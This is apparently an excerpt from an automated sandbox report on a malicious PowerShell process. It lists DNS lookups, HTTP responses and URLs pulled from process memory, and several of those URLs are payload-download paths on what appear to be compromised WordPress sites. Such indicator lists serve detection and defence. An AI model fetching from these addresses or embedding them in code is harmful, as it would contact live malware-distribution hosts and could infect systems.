Source: global traffic	DNS traffic detected: DNS query: trasix.com
Source: global traffic	DNS traffic detected: DNS query: www.parkinsons.co.in
Source: global traffic	DNS traffic detected: DNS query: parkinsons.co.in
Source: global traffic	DNS traffic detected: DNS query: biz.merlin.ua
Source: global traffic	DNS traffic detected: DNS query: bruckevn.site
Source: global traffic	DNS traffic detected: DNS query: pardiskood.com
Source: global traffic	DNS traffic detected: DNS query: daujimaharajmandir.org
Source: global traffic	DNS traffic detected: DNS query: datasits.com
Source: global traffic	DNS traffic detected: DNS query: anugerahmasinternasional.co.id
Source: global traffic	DNS traffic detected: DNS query: atmedic.cl
Source: global traffic	DNS traffic detected: DNS query: anwaralbasateen.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 17:29:07 GMTServer: ApacheX-Powered-By: PHP/7.4.7cf-edge-cache: cache,platform=wordpressExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://trasix.com/wp-json/>; rel="https://api.w.org/"X-Frame-Options: SAMEORIGINConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 17:29:30 GMTServer: ApacheX-Powered-By: PHP/7.4.7cf-edge-cache: cache,platform=wordpressExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://trasix.com/wp-json/>; rel="https://api.w.org/"X-Frame-Options: SAMEORIGINConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 17:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-content-type-options: nosniffreferrer-policy: same-origincross-origin-opener-policy: same-origincf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B3xmV7PnC8mDm%2F35srIm5gfxSfkhiXbN6NfPJeG9%2FDqU1ZE7pxbXLHVvsnJ5W%2BxeLLOw1g0V6D5twRRVv%2BtadByzy957XpwP0bkX33qDYnWH0cofiZjhAvlomXgfv09SjQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8def0c304b9b3464-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1213&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=786&delivery_rate=2197268&cwnd=251&unsent_bytes=0&cid=7b2fbd0b702768da&ts=424&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 17:29:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://anugerahmasinternasional.co.id/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9KcWcRLnTHi6DwWvOjlRUVsfpV2c0Q7%2FDe3qdAeH%2BwhRjUM7c61DEoxnGCQAMLJb4jmWHtEFlonzgLE7tVfYaj0jG9nSQkeiZvkXtffnmipmJ3FxY6Qv0bTujBzEM8OI4R54eCjZGtLQUfuL6bqG%2Bh4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8def0c3c8e972fd8-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1341&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2880&recv_bytes=805&delivery_rate=1930666&cwnd=251&unsent_bytes=0&cid=bacf4c8d3bf46e2e&ts=1918&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 17:29:57 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 01:33:40 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 17:30:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-content-type-options: nosniffreferrer-policy: same-origincross-origin-opener-policy: same-origincf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xGjzZHDR40vBo%2BUltqLFUsgXpIf8i6jVAlr%2BIMz%2BZQBn9LmDdxjSsWw%2BVgdXpS87fPGVKYCbQlhT3m7KB6LQVJe%2BnlYNMUjP8g9lVCOsaUJnjH76mU2aLfet6qinZi0XZw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8def0cbbe9e2e71e-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1234&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=786&delivery_rate=2271372&cwnd=235&unsent_bytes=0&cid=e944020836280335&ts=436&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=15Date: Thu, 07 Nov 2024 17:29:05 GMTServer: ApacheData Raw: 66 0d 0a 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 0a 0d 0a Data Ascii: fAccess denied.
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=15Date: Thu, 07 Nov 2024 17:29:27 GMTServer: ApacheData Raw: 66 0d 0a 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 0a 0d 0a Data Ascii: fAccess denied.
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=15Date: Thu, 07 Nov 2024 17:29:34 GMTServer: ApacheData Raw: 66 0d 0a 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 0a 0d 0a Data Ascii: fAccess denied.

Source: powershell.exe, 00000005.00000002.477673890.0000000003A9F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://actividades.laforetlangh
Source: powershell.exe, 00000005.00000002.477673890.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003A9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.000000000241B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.00000000025D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://actividades.laforetlanguages.com
Source: powershell.exe, 0000000D.00000002.515090897.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://actividades.laforetlanguages.com/wp-admin/BlkdOKDXL/
Source: powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anugerahmasinternasional.co.id
Source: powershell.exe, 00000005.00000002.477673890.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anwaralbasateen.com
Source: powershell.exe, 00000005.00000002.477673890.0000000003096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://biz.merlin.ua
Source: powershell.exe, 00000005.00000002.477673890.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bruckevn.site
Source: powershell.exe, 0000000D.00000002.515090897.00000000025D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bruckevn.site/3yztzzvh/nmY4wZfbYL/
Source: powershell.exe, 00000005.00000002.481718749.000000001C5FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cdn.jsinit.directfwd.com/3
Source: powershell.exe, 00000005.00000002.481718749.000000001C5FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cdn.jsinit.directfwd.com/Z
Source: powershell.exe, 00000005.00000002.481718749.000000001C62D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.481391228.000000001A69C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
Source: powershell.exe, 00000005.00000002.481391228.000000001A69C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php(
Source: powershell.exe, 00000005.00000002.482303968.000000001E19E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php0
Source: powershell.exe, 00000005.00000002.481391228.000000001A610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.phpU
Source: powershell.exe, 00000005.00000002.481718749.000000001C58F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.481718749.000000001C558000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C447000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C434000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000005.00000002.481718749.000000001C53C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C419000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.520619942.000000001ACD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000002.477673890.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://datasits.com
Source: powershell.exe, 00000005.00000002.477673890.000000000335C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.000000000299A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daujimaharajmandir.org
Source: powershell.exe, 00000005.00000002.477673890.0000000003526000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000005.00000002.480991589.0000000012241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C447000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000005.00000002.481718749.000000001C558000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C447000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C434000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000002.477673890.0000000003122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pardiskood.com
Source: powershell.exe, 00000005.00000002.477673890.0000000003096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://parkinsons.co.in
Source: powershell.exe, 00000009.00000002.511859762.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sbcopylive.P
Source: powershell.exe, 0000000D.00000002.515090897.0000000002936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sbcopylive.PH
Source: powershell.exe, 00000005.00000002.477673890.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sbcopylive.com.br
Source: powershell.exe, 0000000D.00000002.515090897.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sbcopylive.com.br/rjuz/w/
Source: powershell.exe, 00000009.00000002.511859762.0000000002702000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sbcopylive.com.br3
Source: powershell.exe, 0000000D.00000002.515090897.0000000002752000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sbcopylive.com.brP
Source: powershell.exe, 00000005.00000002.477673890.0000000002211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.00000000023D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.511859762.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://trasix.com
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000005.00000002.481718749.000000001C56A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.516200270.000000001C457000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.521065638.000000001C514000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.parkinsons.co.in
Source: powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002936000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.parkinsons.co.in.cdn.hstgr.net
Source: powershell.exe, 00000005.00000002.477673890.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id
Source: powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/
Source: powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/#/schema/logo/image/
Source: powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/#organization
Source: powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/#website
Source: powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/?s=
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/comments/feed/
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/feed/
Source: powershell.exe, 0000000D.00000002.515090897.00000000025D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFon
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.
Source: powershell.exe, 00000005.00000002.477673890.000000000308A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/wp-content/themes/landingpress-wp/assets/js/script.min.js?ver
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/wp-content/themes/landingpress-wp/style.css?ver=3.4.2
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/wp-content/uploads/2022/06/cropped-Logo-Ami-1-01-180x180.png
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/wp-content/uploads/2022/06/cropped-Logo-Ami-1-01-192x192.png
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/wp-content/uploads/2022/06/cropped-Logo-Ami-1-01-270x270.png
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/wp-content/uploads/2022/06/cropped-Logo-Ami-1-01-32x32.png
Source: powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/wp-content/uploads/2022/06/cropped-Logo-Ami-1-01.png
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anugerahmasinternasional.co.id/wp-json/
Source: powershell.exe, 00000005.00000002.477673890.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anwaralbasateen.com
Source: powershell.exe, 0000000D.00000002.515090897.00000000025D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anwaralbasateen.com/Fox-C404/mDHkfgebMRzmGKBy/
Source: powershell.exe, 00000005.00000002.477673890.0000000002EB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.000000000281B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, vbkwk.dll.5.dr	String found in binary or memory: https://api.w.org/
Source: powershell.exe, 00000005.00000002.477673890.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.00000000034E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atmedic.cl
Source: powershell.exe, 0000000D.00000002.515090897.00000000025D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://atmedic.cl/sistemas/3ZbsUAU/
Source: powershell.exe, 00000005.00000002.477673890.0000000003096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://biz.meH
Source: powershell.exe, 00000005.00000002.477673890.0000000003096000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.511859762.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://biz.merlin.ua
Source: powershell.exe, 0000000D.00000002.515090897.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.515090897.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://biz.merlin.ua/wp-admin/W6agtFSRZGt371dV/
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/c/6.6.2/wp-includes/css/dist/block-library/style.min.css
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/c/6.6.2/wp-includes/js/jquery/jquery-migrate.min.js
Source: powershell.exe, 00000005.00000002.477673890.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.477673890.0000000003496000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c0.wp.com/c/6.6.2/wp-includes/js/jquery/jquery.min.js
